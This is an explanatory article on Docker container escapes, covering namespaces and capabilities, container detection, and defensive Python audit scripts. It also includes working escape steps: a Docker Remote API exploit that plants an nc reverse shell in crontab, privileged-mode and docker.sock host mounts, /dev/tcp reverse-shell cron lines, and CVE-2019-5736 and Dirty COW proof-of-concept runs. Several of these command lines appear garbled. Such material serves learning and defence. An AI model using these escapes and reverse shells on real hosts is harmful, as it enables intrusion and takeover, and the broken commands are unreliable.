
Summary of Docker Escape Techniques

1 Docker Core Technology

Docker is an open-source application container engine that lets developers package an application and its dependencies into a container and then publish it to any popular Linux machine, which resolves many of the inconsistencies between test and production environments. Compared with traditional virtualization, Docker containers use the host kernel directly and involve no hardware virtualization, which makes them much lighter.

Since it appeared, Docker has often been compared with virtual machines; some people even think Docker is a virtual machine. In general, a virtual machine uses a hypervisor to virtualize memory, CPU and other hardware.

Picture it this way: treat a rectangle as a computer and the circles inside it as processes. The processes share the same computer resources and can all see each other.


What does Docker do? It wraps each process in a shell that isolates it. They can no longer see each other, yet they still run in the same environment and use the same resources as before; the only difference from the unshelled state is that they cannot communicate with each other. Think of this shell as a one-way door: the outside can look in, but the inside cannot look out. On a computer this means that external processes can see internal processes, but internal processes cannot see external ones.


1.1 namespace

Namespaces are a mechanism provided by Linux to separate resources such as process trees, network interfaces, mount points and inter-process communication; they are kernel-level environment isolation. Without them, the state and resources of multiple services on one machine affect each other: each service can see the processes of the other services and can access any file on the host. Docker's goal is that different services on the same machine are completely isolated from each other, as if they were running on different machines. To achieve this, namespaces must be specified when the process is created.

The Linux namespace mechanism provides seven different namespaces: CLONE_NEWCGROUP, CLONE_NEWIPC, CLONE_NEWNET, CLONE_NEWNS, CLONE_NEWPID, CLONE_NEWUSER and CLONE_NEWUTS. Through these seven flags we choose which resources a newly created process should be isolated from the host on.

From the above we can see that Docker does not use virtualization at all; it is an isolation technology. If you are familiar with Linux, you can think of Docker as an advanced chroot.

1.2 Docker security mechanisms

Because Docker relies on isolation rather than virtualization, a container still uses the host's kernel, CPU and memory. Does that cause security problems? Yes, so how does Docker protect the host?

Docker has many security mechanisms: Linux capabilities, AppArmor, SELinux, seccomp and so on. This article mainly discusses Linux capabilities.

Because Docker does not isolate the user namespace by default, when you view /etc/passwd inside the container you see that the uid is 0, that is, root inside the container is root on the host. But if you run certain commands, such as iptables -L, you are told that permissions are insufficient.

This is implemented by the Linux capability mechanism. Since Linux kernel version 2.1 the concept of capabilities has existed; it breaks the operating system's super user / ordinary user split so that an ordinary user can also perform operations that previously only the super user could complete.

There are 38 Linux capabilities, each corresponding to a group of privileged system calls, and Docker enables only a subset of them by default, which avoids many security issues. Anyone familiar with Docker knows that when starting a container you can add the parameter --privileged=true, which is equivalent to turning on all capabilities. Use docker inspect {container.id} to see the added capabilities in the CapAdd item.
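To make the capability discussion concrete, here is an added example (editor's code, not from the original post) that decodes the CapEff/CapBnd bitmasks a container's /proc/self/status reports and flags the capabilities a defender would want to know about. The two status excerpts and the RISKY shortlist are the editor's constructions; the bit order follows linux/capability.h.

```python
# Constructed /proc/<pid>/status excerpts (editor's samples): the first mask is
# what a default Docker container shows, the second is what --privileged shows.
DEFAULT_STATUS = "Uid:\t0\t0\t0\t0\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"
PRIVILEGED_STATUS = "Uid:\t0\t0\t0\t0\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\nCapBnd:\t0000003fffffffff\n"

# Bit index == capability number from linux/capability.h (38 capabilities).
CAP_NAMES = (
    "chown dac_override dac_read_search fowner fsetid kill setgid setuid "
    "setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw "
    "ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct "
    "sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod "
    "lease audit_write audit_control setfcap mac_override mac_admin syslog "
    "wake_alarm block_suspend audit_read"
).split()

# Capabilities whose presence inside a container deserves an alert. This
# shortlist is the editor's assumption, not something the post states.
RISKY = {"sys_admin", "sys_module", "sys_ptrace", "sys_rawio", "dac_read_search", "net_admin"}


def decode_caps(mask_hex):
    """Turn a hex mask such as 00000000a80425fb into a list of capability names."""
    mask = int(mask_hex, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def parse_status(text):
    """Map each Cap* line of a /proc/<pid>/status dump to its decoded capability list."""
    caps = {}
    for line in text.splitlines():
        if line.startswith("Cap"):
            key, _, value = line.partition(":")
            caps[key] = decode_caps(value.strip())
    return caps


def audit(text):
    """Report the effective capability set and the subset a defender should worry about."""
    effective = set(parse_status(text).get("CapEff", []))
    return {"effective": sorted(effective), "risky": sorted(effective & RISKY)}


if __name__ == "__main__":
    try:  # inside a real container this reads the live values
        text = open("/proc/self/status").read()
    except OSError:  # not on Linux: fall back to the constructed sample
        text = DEFAULT_STATUS
    print(audit(text))
```

A default container decodes to 14 capabilities with nothing in the risky set; a --privileged container decodes to all 38.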


2 Determining whether you are inside a Docker container

First we need to determine whether we are running in a Docker environment. Two commonly used detection methods are:

Check whether the /.dockerenv file exists.

Check whether /proc/1/cgroup contains strings such as docker.

At present these two detection methods are relatively effective. Other methods, such as inspecting the mount output, running fdisk -l to view the disks, and checking the process name of PID 1, can also be used to support the judgment.
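The checks above, combined into one function as an added example (editor's code, not from the original post). It also covers a case the post does not mention: on a cgroup v2 host /proc/1/cgroup is just "0::/", so the cgroup check alone misses the container and the other signals have to carry the decision. The sample cgroup contents are constructed.

```python
import os

# Substrings in /proc/1/cgroup that point to a container runtime (cgroup v1 layout).
CGROUP_MARKERS = ("docker", "kubepods", "containerd", "lxc")

# Constructed samples (editor's): a cgroup v1 container, and a cgroup v2 one
# whose /proc/1/cgroup carries no runtime name at all.
CGROUP_V1 = "12:pids:/docker/0123456789abcdef\n1:name=systemd:/docker/0123456789abcdef\n"
CGROUP_V2 = "0::/\n"


def cgroup_hints(cgroup_text):
    """Runtime names found in the /proc/1/cgroup text, sorted for stable output."""
    return sorted(m for m in CGROUP_MARKERS if m in cgroup_text)


def container_evidence(dockerenv_exists, cgroup_text, pid1_comm):
    """Return the reasons for believing we are inside a container (empty list = none)."""
    reasons = []
    if dockerenv_exists:
        reasons.append("/.dockerenv exists")
    hints = cgroup_hints(cgroup_text)
    if hints:
        reasons.append("/proc/1/cgroup mentions " + ", ".join(hints))
    # Weaker hint: on a normal host PID 1 is an init system; in a container it is
    # usually the application itself or a shell.
    if pid1_comm not in ("systemd", "init"):
        reasons.append(f"PID 1 is '{pid1_comm}', not an init system")
    return reasons


def check_live():
    """Gather the same evidence from the running system (meaningful on Linux only)."""
    def read(path):
        try:
            with open(path) as f:
                return f.read()
        except OSError:
            return ""
    return container_evidence(os.path.exists("/.dockerenv"),
                              read("/proc/1/cgroup"),
                              read("/proc/1/comm").strip())


if __name__ == "__main__":
    print(check_live() or ["no container evidence found"])
```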


3 Docker escapes caused by misconfiguration

3.1 Unauthorized access to the Docker Remote API

Vulnerability description: the Docker Remote API can execute Docker commands. When the Docker daemon listens on 0.0.0.0 without authentication, anyone who can reach the port can call the API directly to operate Docker.

The method is to start an arbitrary container and mount the host's /etc directory into it, so that host files can be read and written at will. Writing a command into the crontab file then yields a reverse shell.

EXP:

import docker
client=docker.DockerClient(base_url='http://your-ip:2375/')
data=client.containers.run('alpine:latest', r'''sh -c 'echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' /tmp/etc/crontab' ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

3.2 docker.sock mounted inside the container

Scenario description: put simply, Docker in Docker. The host's docker binary and docker.sock file are mounted into a container so that the host's Docker can be invoked from inside the container, specifically:

docker run --rm -it \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /usr/bin/docker:/usr/bin/docker \
ubuntu \
/bin/bash

Vulnerability reproduction:

Find docker.sock in the container:

root@95a280bc5a19:/# find / -name docker.sock
/run/docker.sock

View the host's Docker information from inside the container:

docker -H unix:///var/run/docker.sock info

Run a new container and mount the host's root path:

docker -H unix:///var/run/docker.sock run -it -v /:/test ubuntu /bin/bash

In the /test directory of the new container you can access all of the host's files. The next step is to write an SSH key or a scheduled task to obtain a shell.

3.3 High-risk Docker startup parameters

Some Docker startup parameters are relatively high risk: they give the container greater permissions and allow privileged operations, and under certain conditions the container can escape.

docker run --rm -it \
--privileged \
-v /:/soft \
--cap-add=SYS_ADMIN \
--net=host \
--pid=host \
--ipc=host \
ubuntu \
/bin/bash
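Each of the flags above leaves a trace in the HostConfig section of docker inspect output, so a host-side audit can find containers started this way. The following is an added example (editor's code, not from the original post) that flags those settings; the inspect JSON and the list of sensitive bind sources are the editor's constructions.

```python
import json

# Constructed sample of what `docker inspect <container>` returns for a container
# started with the risky flags above (editor's sample, not captured output).
SAMPLE_INSPECT = json.dumps([{
    "Id": "constructed0000000000000000000000000000000000000000000000000000",
    "Name": "/risky",
    "HostConfig": {
        "Privileged": True,
        "Binds": ["/:/soft", "/var/run/docker.sock:/var/run/docker.sock"],
        "CapAdd": ["SYS_ADMIN"],
        "NetworkMode": "host",
        "PidMode": "host",
        "IpcMode": "host",
    },
}])

# Bind-mount sources that expose the host; this starting list is the editor's.
SENSITIVE_SOURCES = ("/", "/var/run/docker.sock", "/run/docker.sock", "/etc", "/dev")


def audit_inspect(inspect_json):
    """Return (container, finding) pairs for risky HostConfig settings."""
    findings = []
    for c in json.loads(inspect_json):
        name, hc = c.get("Name", c.get("Id")), c.get("HostConfig", {})
        if hc.get("Privileged"):
            findings.append((name, "--privileged: all capabilities, host devices visible"))
        for cap in hc.get("CapAdd") or []:
            findings.append((name, f"--cap-add={cap}"))
        for bind in hc.get("Binds") or []:
            src = bind.split(":")[0]
            if src in SENSITIVE_SOURCES:
                findings.append((name, f"host path {src} bind-mounted ({bind})"))
        for key, flag in (("NetworkMode", "--net"), ("PidMode", "--pid"), ("IpcMode", "--ipc")):
            if hc.get(key) == "host":
                findings.append((name, f"{flag}=host: shares the host {key[:-4].lower()} namespace"))
    return findings


if __name__ == "__main__":
    import sys  # usage: docker inspect <container> | python3 audit_inspect.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, finding in audit_inspect(data):
        print(name, finding)
```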

Privileged mode (--privileged)

When a container is started in privileged mode, whoever administers it can mount the host's disk devices into the container with the mount command and thereby obtain read and write access to the entire host file system. From there, commands can be executed on the host by writing scheduled tasks and similar means.

Run a container in privileged mode:

docker run -itd --privileged ubuntu:latest /bin/bash

Inside the container, list the disk devices:

fdisk -l

Mount /dev/sda1 on a new directory:

mkdir /test
mount /dev/sda1 /test

Write a scheduled task onto the host:

echo '* * * * * /bin/bash -i /dev/tcp/172.19.0.1/4444 01' /test/var/spool/cron/crotabs/root

3.4 Escapes caused by Docker software design

3.4.1 CVE-2019-5736

CVE-2019-5736 is a vulnerability in runC. runC was originally developed as part of Docker and was later split out as a separate open-source tool and library. In the Docker architecture, containerd provides Docker with an API for running containers, the two talk over gRPC, and containerd in turn uses runC to actually run the container.

Affected versions: docker version=18.09.2, RunC version=1.0-rc6

Exploitation conditions: the attacker controls an image and, through it, the container created from it; or the attacker has write access to an existing container that an administrator will enter with docker exec.

Vulnerability reproduction: download and install the test environment image.

curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh
bash install.sh

Download the PoC, modify the script and compile it:

# Download poc
git clone https://github.com/Frichetteten/CVE-2019-5736-PoC
# Modify Payload
vi main.go
payload='#!/bin/bash \n bash -i /dev/tcp/172.19.0.1/4444 01'
# Compile and generate payload
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
# Copy to docker container
docker cp ./main 248f8b7d3c45:/tmp

Execute the payload in the container:

root@d1b112ea4a5e:/tmp# ./main
[+] Overwritten /bin/sh successfully
[+] Found the PID: 16
[+] Successfully got the file handle
[+] Successfully got write handle {0xc8201231e0}

Suppose the administrator now enters the container with exec, triggering the payload:

docker exec -it cafa20cfb0f9 /bin/sh

Listening on the port on 172.19.0.1 receives the shell that the host connects back with.

3.4.2 CVE-2019-14271

https://xz.aliyun.com/t/6806

3.5 Kernel vulnerabilities

Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel. It can be used to escape a Docker container and obtain a root shell.

Environment preparation: Docker shares the kernel with the host, so we need a host image that carries the Dirty COW vulnerability.

Download and run the container:

git clone https://github.com/gebl/dirtycow-docker-vdso.git
cd dirtycow-docker-vdso/
sudo docker-compose run dirtycow /bin/bash

Exploitation: enter the container, compile the PoC and execute it.

cd /dirtycow-vdso/
make
./0xdeadbeef 172.19.0.1:4444


Listening on the port on 172.19.0.1 receives the shell that the host connects back with.

